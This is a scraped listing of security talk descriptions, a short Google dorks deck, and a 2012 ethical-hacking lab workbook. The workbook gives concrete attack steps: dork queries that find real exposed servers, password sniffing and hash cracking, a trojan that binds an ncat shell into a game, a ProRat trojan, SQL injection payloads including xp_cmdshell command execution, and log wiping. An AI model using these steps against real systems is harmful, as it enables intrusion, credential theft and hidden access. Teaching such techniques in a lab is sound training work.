Системы класса SIEM могут быть вполне применимы не только для информационной безопасности, но и ИТ персоналом, разработчиками для своевременного обнаружения и предотвращения инцидентов
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхDmitry Evteev
Уязвимости и атаки на Web-приложения, общепринятые классификации уязвимостей. Ошибки, допускаемые разработчиками при создании клиентской и серверной частей Web-приложения, их возможные последствия и методы выявления и устранения. Примеры из практики. Обзор специализированных средств защиты Web-приложений: Web Application Firewall (WAF). Стоит ли полагаться на WAF?
Методология выявления уязвимостей в Web-приложениях, в частности, с использованием различных средств автоматического анализа.
Ведущий: Владимир Иванов и Сергей Гордейчик
Эксперт ИТ и исследователь кибербезопасности поделятся своим взглядом на проблему современных целевых атак, спонсируемых государствами и криминальными группировками. Докладчики расскажут об эффективности существующих подходов к защите, о способах обхода песочницы, и о том, пора ли IDS и AV отправляться на свалку.
Magic Box, или Как пришлось сломать банкоматы, чтобы их спастиPositive Hack Days
Ведущие: Ольга Кочетова и Алексей Осипов
Доклад посвящен наиболее популярным атакам на банкоматы, а также методам их предотвращения. Докладчик продолжит тему своих прошлых презентаций, однако с более глубоким проникновением в технические детали. Основное внимание будет уделено проблемам безопасности в архитектуре банкоматов и недостаткам защищенности взаимодействия банкоматов с процессинговым центром.
Cis critical security controls. контроль 3 безопасная конфигурация устройствTeymur Kheirkhabarov
3-ий контроль из набора мер CIS Critical Security Controls 6-ой версии - что это такое, зачем это нужно, как реализовать и контролировать. Пример реализации на базе решений Kaspersky, MaxPatrol и Request Tracker. Пример использования Request Tracker для учёта информационных активов.
The document discusses how modern Intel CPUs contain debugging features like JTAG that could enable hardware trojans if activated. It describes how the Intel Direct Connect Interface allows activating JTAG-like debugging over USB, potentially allowing full system control. It demonstrates activating DCI on a laptop through the UEFI and explains how to detect if DCI is enabled. The document warns that DCI could lead to a "new age of BadUSB" if used maliciously.
This document outlines the structure and content of an online course titled "Learning 2.0" that uses various social media tools. It includes an overview of the weekly topics which involve objectives, evaluations, readings, exercises and discussions. The course utilizes tools like Facebook, blogs, tags, RSS feeds, Twitter, wikis and podcasting. It also provides help resources and notes that content is archived on other sites. The document concludes by thanking the presenter and providing their contact information.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
This document discusses using honeypots to reverse penetrate attackers and gain intelligence on them. It describes how a honeypot was used to collect information from attackers like usernames, source IPs, and intermediate hosts. On some occasions, it allowed gaining access to third party services those attackers had authenticated with. The document concludes honeypots can provide useful intelligence but also raises legal and ethical concerns with counterattacking or collecting personal information.
I'm Andrea D'Ubaldo, I am a software developer and cyber security enthusiast. The purpose of this presentation is to warn people about google "hacking".
I don't pretend to teach, I only love sharing knowledge. Hope you enjoy ! Comments and remarks are welcome.
------------------------------------------------
Summary
- What is Google dorks
- Queries syntax
- Queries examples
- Conclusion
Google Dork Definition
"A Google dork is an employee who unknowingly exposes sensitive corporate information on the Internet. The word dork is slang for a slow-witted or in-ept person."
Margaret Rouse
Director, WhatIs.com at TechTarget
@WhatIsDotCom
What is
Google dorks is a powerful advanced search, an instrument to perform queries on Google search engine.
How it works
That queries allows the user to find detailed information over the internet, such files, hidden pages, sensitive documents and so on.
Why use
But...dork queries are considered by many an “hacking technique”. Because of his nature, the dorks can be used for different purposes, often bad purpose and we shall then see...
Queries syntax
a) inurl
Find that word or sentences in the URL
inurl: php?id=
b) related
Find that related websites
related:www.google.com
c) filetype
research by file type
filetype:pdf shakespeare
d) site
Restrict to a specific site
site:fakesite.com
e) intitle
Find that word or sentences in the title of a website
intitle: search
...Other syntax characters and operators.
Examples :
- Search files containing username and password
- Discover vulnerable server, affected by SQL Injection
- Pages containing login portal
- Sensitive directory
Credits and References
What is Google dork? – Margaret Rouse
What is Google dork? - WhatIs.com - TechTarget
whatis.techtarget.com
Conclusion
Be careful and protect your data!
Google hacking
https://en.wikipedia.org/wiki/Google_hacking
Wikipedia.
Google Hacking Database (GHDB)
https://www.exploit-db.com/google-hacking-database/
Exploit Database
Special thanks to all the people who made and released these awesome resources for free:
Presentation template by SlidesCarnival (http://www.slidescarnival.com/)
Photographs by Unsplash (http://unsplash.com/)
12 free (or almost free) sourcing tools every sourcing pro shouldn't live without, presented by Glenn Gutmacher with RecruitingBlogs.com and RecruitiFi.
Get your own RecruitiFi account: http://rdaily.co/1BRujup
Метод машинного обучения для распознавания сгенерированных доменных именPositive Hack Days
Ведущий: Александр Колокольцев
Доклад посвящен использованию машинного обучения для выявления доменных имен, сгенерированных при помощи Domain Generation Algorithm. Для решения задачи предлагается N-грамм-анализ. Будет подробно описан анализатор доменных имен, при использовании которого была достигнута точность в 98,5%.
Для всех популярных облачных провайдеров данных существуют сервисы, позволяющие анонимно загружать файлы в расшаренные пользователями хранилища. Примерами таких сервисов могут служить Dropittome, Balloon, Cloudwok, Sookasa. С учетом того, что конечные пользователи часто устанавливают клиенты для синхронизации с облаком, данный способ доставки зловредов на компьютер жертвы становится весьма действенным.
Возможно, время не на твоей стороне. Реализация атаки по времени в браузереPositive Hack Days
Ведущий: Том Ван Гутем
В докладе будет рассмотрена новая киберугроза: атака по времени с использованием браузера. Атакующий добывает секретный ключ криптосистемы (например, RSA) при помощи анализа времени, затрачиваемого на шифрование входных данных, и получает доступ к конфиденциальной информации, размещенной на доверенном веб-сайте. Исследовав популярные веб-службы (приложения для работы с электронной почтой, социальные сети и сайты финансовых учреждений), докладчик выяснил, что атака компрометирует каждую из них и представляет неминуемую угрозу безопасности пользователей. Вниманию слушателей будет предложено несколько случаев из практики, иллюстрирующих тяжелые последствия атаки.
This document provides tips from Ian Lurie on internet safety for kids. Some key points include:
- Teach kids basic rules like never sharing personal information or passwords online
- Monitor kids' online activities and limit the number of devices and accounts they have access to
- Explain to kids that what they post online can have lasting consequences and not to post photos or videos of other kids without permission
- Get tech savvy yourself by learning how to use tools like Google search to find information and help keep kids safe online.
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Bishop Fox
The document discusses drone defenses and countermeasures that are emerging to defend against unauthorized drones. It describes various experimental systems that have been proposed or developed, including using trained birds of prey, drone-mounted nets, ground-based net guns, jamming cannons, and portable jammers. However, the document notes there are currently no established best practices for drone defense. It proposes developing inexpensive penetration testing drones to help evaluate and improve the emerging defenses.
The document appears to be a list of URLs pointing to different guestbook scripts and pages. Specifically, it includes over 50 URLs ending in "yybbs.cgi" which seems to be related to a Japanese bulletin board or guestbook script. It also includes URLs pointing to files named "E-Guest_sign.pl" which is likely a Perl guestbook signing script. Finally, it lists many URLs ending in "Guestbook.php" which indicates PHP-based guestbook pages. The large collection of URLs seems to be documenting or exploring the usage of different guestbook systems on the internet.
Леонид Васильев "Python в инфраструктуре поиска"Yandex
2 июля 2011, Я.Субботник в Екатеринбурге
Леонид Васильев "Python в инфраструктуре поиска"
О докладе:
Описание архитектуры и реализации внутренних инструментов для управления поисковым кластером.
Что такое инфраструктура поиска? Какие задачи приходится решать? Какие инструменты для управления кластером используются в поиске? Как они устроены изнутри? Что можно посоветовать проектам с большой инфраструктурой? Какие существуют open-source аналоги?
Михаил Давыдов "Масштабируемые JavaScript-приложения"Yandex
Михаил Давыдов "Масштабируемые JavaScript-приложения"
Я.Субботник в Челябинске в рамках конференции UWDC
О докладе:
О чем нужно подумать во время проектирования архитектуры. Какую архитектуру нужно заложить, чтобы приложение могло безболезненно развиваться.
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковYandex
Антивирусная система Яндекса ежедневно обнаруживает тысячи взломанных сайтов. Периодически среди них встречаются крупные и известные интернет-ресурсы.
Администраторы сайтов часто оказываются не готовы к тому, что злоумышленник может пробраться через внешний периметр и исполнить произвольный код на стороне сервера. В результате перед ними встаёт нелегкая задача: обнаружить последствия и предотвратить дальнейшие проблемы.
Доклад посвящён практикам и инструментам, которые могут существенно повысить эффективность противодействия вредоносной активности, и профилактике её возникновения.
Как перестать хранить секреты в git и начать использовать Hashicorp VaultOleg Mykolaichenko
Покажу как выпилить пароли/сертификаты/важные данные из репозиториев. Дам всю необходимую информацию для внедрения Hashicorp Vault в вашей компании и команде. Сделаю акцент на использовании в контейнерных инфраструктурах. Рассмотрю продвинутые практики использования и юз-кейсы с вау эффектом, которые работают в реальной жизни. Тут будут звучать такие слова как Ansible, Chef, Puppet, Docker, Swarm, Kubernetes etc.
Доклад, который сможет помочь сделать все хорошо, даже если сейчас все плохо.
Популярні способи зломів та шахрайські схемиAvivi Academy
Security Meetup
Іван Бондар
Elogic Commerce - Magento Development
Розробник систем веб-комерції на платформі Magento. 4 роки досвіду роботи з відомими міжнародними брендами, в розподілених командах з Франції, Німеччини, Англії, Італії, Австралії та США
Тези:
– підбір інструментів для зломів;
– доставка експлойта;
– отримання контролю над системою жертви;
– розширення можливостей контролю в атакуючому середовищі;
– крадіжка даних;
– виконання цілей атаки.
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...Fwdays
Покажу как выпилить пароли/сертификаты/важные данные из репозиториев. Дам всю необходимую информацию для внедрению Hashicorp Vault в вашей компании и команде. Сделаю акцент на использовании в контейнерных инфраструктурах. Рассмотрю продвинутые практики использования и юз-кейсы с вау эффектом, которые работают в реальной жизни. Тут будут звучать такие слова как Ansible, Chef, Puppet, Docker, Swarm, Kubernetes etc.
Доклад, который сможет помочь сделать все хорошо, даже если сейчас все плохо.
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с ProductionVladimir Malinin
Если приложение регулярно падает, заказчики нервничают, сроки поджимают и не понятно в чём проблема, не стоит паниковать. Мы расскажем вам, что делать в такой ситуации и покажем, как мы выходили из сложившейся ситуации. В докладе на примере двух реальных проектов рассматриваются проблемы, которые могут возникать с Web приложениями на production environment’ах, пути их решения и инструменты, которые для этого могут быть использованы. Подробно будет рассмотрена настройка и использование JavaMelody. Докладчики: Владимир Малинин и Антон Семаник (Nix Solutions)
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"Fwdays
Как искать и выбирать оптимальные решения? Для одной задачи подойдет React, для другой - Zepto. Сегодня вы пишите для браузера, завтра думаете, как использовать native-ресурсы iOS.
Не все технологии, которые удобны разработчику, могут дать удобство конечному пользователю.
Я расскажу о балансе, который позволяет бизнесу получать результат, а разработчику - решение.
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
1. Основные понятия и определения: продукт, пакет, связи между ними.
2. Как узнать, какие изменения произошли в продукте?
3. Проблемы changelog и release note.
4. Решение: инструмент ChangelogBuilder для автоматической подготовки Release Notes
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
1. Обзор Windows Docker (кратко)
2. Как мы построили систему билда приложений в Docker (Visual Studio\Mongo\Posgresql\etc)
3. Примеры Dockerfile (выложенные на github)
4. Отличия процессов DockerWindows от DockerLinux (Долгий билд, баги, remote-регистр.)
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
1. Проблемы в построении CI процессов в компании
2. Структура типовой сборки
3. Пример реализации типовой сборки
4. Плюсы и минусы от использования типовой сборки
1. Что такое BI. Зачем он нужен.
2. Что такое Qlik View / Sense
3. Способ интеграции. Как это работает.
4. Метрики, KPI, планирование ресурсов команд, ретроспектива релиза продукта, тренды.
5. Подключение внешних источников данных (Excel, БД СКУД, переговорные комнаты).
Approof — статический анализатор кода для проверки веб-приложений на наличие уязвимых компонентов. В своей работе анализатор основывается на правилах, хранящих сигнатуры искомых компонентов. В докладе рассматривается базовая структура правила для Approof и процесс автоматизации его создания.
Задумывались ли вы когда-нибудь о том, как устроены современные механизмы защиты приложений? Какая теория стоит за реализацией WAF и SAST? Каковы пределы их возможностей? Насколько их можно подвинуть за счет более широкого взгляда на проблематику безопасности приложений?
На мастер-классе будут рассмотрены основные методы и алгоритмы двух основополагающих технологий защиты приложений — межсетевого экранирования уровня приложения и статического анализа кода. На примерах конкретных инструментов с открытым исходным кодом, разработанных специально для этого мастер-класса, будут рассмотрены проблемы, возникающие на пути у разработчиков средств защиты приложений, и возможные пути их решения, а также даны ответы на все упомянутые вопросы.
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
Разработка наукоемкого программного обеспечения отличается тем, что нет ни четкой постановки задачи, ни понимания, что получится в результате. Однако даже этом надо программировать то, что надо, и как надо. Докладчик расскажет о том, как ее команда успешно разработала и вывела в промышленную эксплуатацию несколько наукоемких продуктов, пройдя непростой путь от эксперимента, результатом которого был прототип, до промышленных версий, которые успешно продаются как на российском, так и на зарубежном рынках. Этот путь был насыщен сложностями и качественными управленческими решениями, которыми поделится докладчик
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
Немногие разработчики закладывают безопасность в архитектуру приложения на этапе проектирования. Часто для этого нет ни денег, ни времени. Еще меньше — понимания моделей нарушителя и моделей угроз. Защита приложения выходит на передний план, когда уязвимости начинают стоить денег. К этому времени приложение уже работает и внесение существенных изменений в код становится нелегкой задачей.
К счастью, разработчики тоже люди, и в коде разных приложений можно встретить однотипные недостатки. В докладе речь пойдет об опасных ошибках, которые чаще всего допускают разработчики Android-приложений. Затрагиваются особенности ОС Android, приводятся примеры реальных приложений и уязвимостей в них, описываются способы устранения.
Разработка любого софта так или иначе базируется на требованиях. Полный перечень составляют бизнес-цели приложения, различные ограничения и ожидания по качеству (их еще называют NFR). Требования к безопасности ПО относятся к последнему пункту. В ходе доклада будут рассматриваться появление этих требований, управление ими и выбор наиболее важных.
Отдельно будут освещены принципы построения архитектуры приложения, при наличии таких требований и без, и продемонстрировано, как современные (и хорошо известные) подходы к проектированию приложения помогают лучше строить архитектуру приложения для минимизации ландшафта угроз.
Доклад посвящен разработке корректного программного обеспечения с применением одного из видов статического анализа кода. Будут освещены вопросы применения подобных методов, их слабые стороны и ограничения, а также рассмотрены результаты, которые они могут дать. На конкретных примерах будет продемонстрировано, как выглядят разработка спецификаций для кода на языке Си и доказательство соответствия кода спецификациям.
The document discusses preventing attacks in ASP.NET Core. It provides an overview of topics like preventing open redirect attacks, cross-site request forgery (CSRF), cross-site scripting (XSS) attacks, using and architecture of cookies, data protection, session management, and content security policy (CSP). The speaker is an independent developer and consultant who will discuss built-in mechanisms in ASP.NET Core for addressing these security issues.
1. Positive Hack Days 2012 Сергей Клевогин
Этичный хакинг. Рабочая тетрадь.
Практическая работа 0. Методология СЕН.
Убедиться, что по методологии СЕН хакинг состоит из нескольких фаз:
1. Сбор данных
2. Сканирование и перечисление
3. Взлом системы и сервисов
4. Поддержка доступа
5. Скрытие следов
Для этого в Google набрать «Ethical Hacking Phases», перейти по первой же ссылке
http://hack-o-crack.blogspot.com/2010/12/five-stages-of-ethical-hacking.html
Посмотреть на текст.
Определить на какой фазе хакинга находится использование троянов, а на какой Metasploit.
1
2. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 1. Сбор данных.
Задача 1.
Убедиться, что существует Google Hacking Data Base.
Для этого в Google набрать «GHDB», перейти по первой же ссылке
http://www.hackersforcharity.org/ghdb/
Просмотреть различные типы запросов, позволяющие обнаружить:
Бюллетени и уязвимости
Сообщения об ошибках
Файлы, содержащие интересную информацию
Файлы, содержащие пароли
Файлы, содержащие имена пользователей
Страницы-плацдармы
Страницы входа в порталы
Страницы, содержащие данные о сети или уязвимостях
Важные каталоги
Важная информация о покупках в Интернете
Различные онлайн устройства
Уязвимые файлы
Уязвимые серверы
Сведения о веб-сервере
Покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа.
Перейти к сообщениям об ошибках:
http://www.hackersforcharity.org/ghdb/?function=summary&cat=10
Обнаружить последнюю запись в базе данных. Обратить внимание на дату записи.
Для интереса перейти по первой ссылке
http://www.hackersforcharity.org/ghdb/?function=detail&id=143
и поискать в Google « intitle:”Nessus Scan Report” “This file was generated by Nessus” »:
Обнаружить уже готовый отчет об уязвимостях Nessus.
Проверить, не притаился ли подобный отчет об уязвимостях на сайте вашей организации.
2
3. Positive Hack Days 2012 Сергей Клевогин
Задача 2.
Поискать более новую базу данных GHDB.
Для этого в Google набрать «GHDB 2012», перейти по первой же ссылкe
http://www.exploit-db.com/google-dorks/
Обратить внимание на последние записи «Latest Google Hacking Entries».
Сравнить различные типы запросов с предыдущим списком. Не найти отличий.
Снова покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа.
Перейти к сообщениям об ошибках:
http://www.exploit-db.com/google-dorks/7/
Перейти по первой ссылке
http://www.exploit-db.com/ghdb/3785/
и поиcкать в Google «inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" -
site:"stackoverflow.com" -inurl:"*forums*"»
Найти реальный сервер в Интернете с сообщением об ошибке. Заглянуть на главную страницу
сайта. Оценить приличность дизайна.
Проверить, нет ли страниц с подобной ошибкой на сайте вашей организации.
3
4. Positive Hack Days 2012 Сергей Клевогин
Задача 3.
Познакомиться с Search Diggity.
http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/
Скачать и установить SearchDiggity. Пока устанавливается почитать справку.
Запустить SearchDiggity, идентифицировать элементы интерфейса.
Следуя указаниям справки:
Создать API ключ. Завести аккаунт в Google, если его еще нет;
Создать Google Custom Search ID;
Выбрать сайт в окошке выбора сайта справа;
Запустить сканирование вашего сайта, выбрав запросы GHDB.
Добиться результата подобного этому:
Изучить другие возможности DiggitySearch.
4
5. Positive Hack Days 2012 Сергей Клевогин
Задача 4.
Выкачать сайты Cars и Brown себе на компьютер.
Для этого скачать и установить httrack.
После установки обнаружить на компьютере графический интерфейс WinHTTrack
и средство командной строки httrack .
Один сайт загрузите, используя WinHTTrack, другой с использованием httrack.
Чтобы посмотреть синтаксис httrack используем
httrack --help
5
6. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 2. Сканирование и перечисление.
Задача 0.
Познакомиться с теорией сканирования.
Для этого:
познакомиться с RFC 791, 792, 793. ( http://www.rfc-editor.org/ )
Зайти на сайт nmap:
http://nmap.org/man/ru/man-port-scanning-techniques.html
Познакомиться с основными приемами сканирования портов.
Добавить ссылку в избранное, чтобы потом повторно перечитать.
Узнать, что такое перечисление и какое оно бывает.
Для этого запомнить, что бывает:
Перечисление NetBIOS
Перечисление SNMP
Перечисление UNIX
Перечисление LDAP
Перечисление NTP
Перечисление SMTP
Перечисление DNS
6
7. Positive Hack Days 2012 Сергей Клевогин
Задача 1.
Просканировать сеть, обнаружить учебный веб-сервер.
Для этого скачать и установить nmap.
Изучить синтаксис nmap:
nmap --help
Запустить сканирование из интерфейса
командной строки:
nmap 192.168.1.0/25 -p80
Обнаружить системы с открытым 80 портом
Запустить сканирование из графического интерфейса и посмотреть результат.
Задача 2.
Обнаружить шлюз по умолчанию на целевой системе со включенным SNMP.
Для этого познакомиться с RFC1213, RFC 1157 и синтаксисом snmputil
Чтобы узнать шлюз нужно выполнить команду:
snmputil get CEH public .1.3.6.1.2.1.4.21.1.7.0.0.0.0
7
8. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 3. Хакинг системы.
Задача 0.
Познакомиться с архитектурой операционной системы.
Для этого в Google набрать «Архитектура Windows» и кликнуть Картинки
Картинки обычно сопровождаются статьями с полезной информацией.
То же самое повторить с архитектурой Linux/Unix.
Сделать вывод,что система взаимодействует с внешним миром через:
драйверы, компоненты ядра (и даже прошивки оборудования);
сетевые сервисы;
клиентские приложения, которые обращаются на чужой сервер;
любые приложения, которые скачиваются и запускаются в системе (трояны).
8
9. Positive Hack Days 2012 Сергей Клевогин
Задача 1.
Подсмотреть пароль, передаваемый по сети.
Для этого скачать и установить Wireshark (http://www.wireshark.org )
Подключиться к любому серверу по любому незащищенному протоколу, требующему
аутентификацию.
Найти пароль в дампе Wireshark.
Если это пароль доменной учетной записи, то однажды подсмотренный через незащищенный
протокол, может быть использован через любой другой протокол.
Задача 2.
Подсмотреть все пароли, передаваемые по сети.
Скачать и установить Cain & Abel (http://www.oxid.it/cain.html )
Запустить сниффер.
Проявить сетевую активность, обратить внимание на захваченные пароли.
9
10. Positive Hack Days 2012 Сергей Клевогин
Задача 3.
Атаковать хэши паролей.
В Cain & Abel на вкладке Cracker импортировать хэши паролей с локального компьютера.
Провести атаку на пароли локальных пользователей по словарю и брут-форсом.
10
11. Positive Hack Days 2012 Сергей Клевогин
Задача 4.
Использование кейлоггера.
Установить PuntoSwitcher (http://punto.yandex.ru )
Включить возможность ведения дневника.
Увидеть, как в дневнике отображаются пароли.
11
12. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 4. Поддержка доступа.
Задача 1.
Создать трояна, открывающего shell.
Для этого используя MicroJoiner объединить игру Gamux.exe с
ncat -l 8888 –e cmd
После запуска игры к компьютеру можно подключиться из командной строки:
ncat 192.168.1.14 8888
12
13. Positive Hack Days 2012 Сергей Клевогин
Задача 2.
Создать трояна с помощью ProRat
Для этого скачать и запустить ProRat (http://www.prorat.net/downloads.php )
Сделать сервер, используя настройки по умолчанию и без уведомлений.
Запустить сервер, початиться с жертвой.
13
14. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 5. Взлом веб-сервера посредством XSS
Задача 1.
Протестировать сайт Cars на возможность XSS.
Для этого попробовать добавить в Feedback сообщение:
hello <script>alert("PREVED")</script>
Задача 2.
Протестировать сайт Brown на возможность XSS.
Для этого попробовать добавить в Feedback сообщение:
hello <script>alert("PREVED")</script>
14
15. Positive Hack Days 2012 Сергей Клевогин
Практическая работа 6. Взлом посредством SQL - инъекции
Задача 0.
Познакомиться с теорией SQL инъекций.
Для этого можно использовать различные источники (http://ru.wikipedia.org/wiki )
Задача 1.
Обойти аутентификацию.
Для этого в форме ввода логина можно попробовать SQL инъекцию:
blah' or 1=1 --
Задача 2.
Идентифицировать число столбцов таблицы login_t базы данных Cars.
Для этого в форме ввода логина пробуем SQL инъекцию:
1' UNION SELECT 1,..,N ;-- и следим за логикой приложения
При инъекции 1' UNION SELECT 1,2,3 ;--
ответ приложения изменится, значит, сервер принял запрос и в таблице три поля.
15
16. Positive Hack Days 2012 Сергей Клевогин
Задача 3.
Создать пользователя в базе данных SQL.
Для этого будем пробовать различные SQL инъекции:
blah';insert into login_t values ('xaker','123');--
В случае успешной инъекции получится зайти в систему с новой учетной записью.
Задача 4.
Выполнить команду на сервере.
Потестируем возможности выполнения различных команд. Например,
'; exec master..xp_cmdshell 'ipconfig/all > C:inetpubwwwrootbrownipconfig.txt';--
В случае успеха результат команды будет доступен через URL
http://ceh/Brown/ipconfig.txt
Практическая работа 7. Скрытие следов.
Удалить все программы и временные файлы, почистить логи и ключи реестра.
16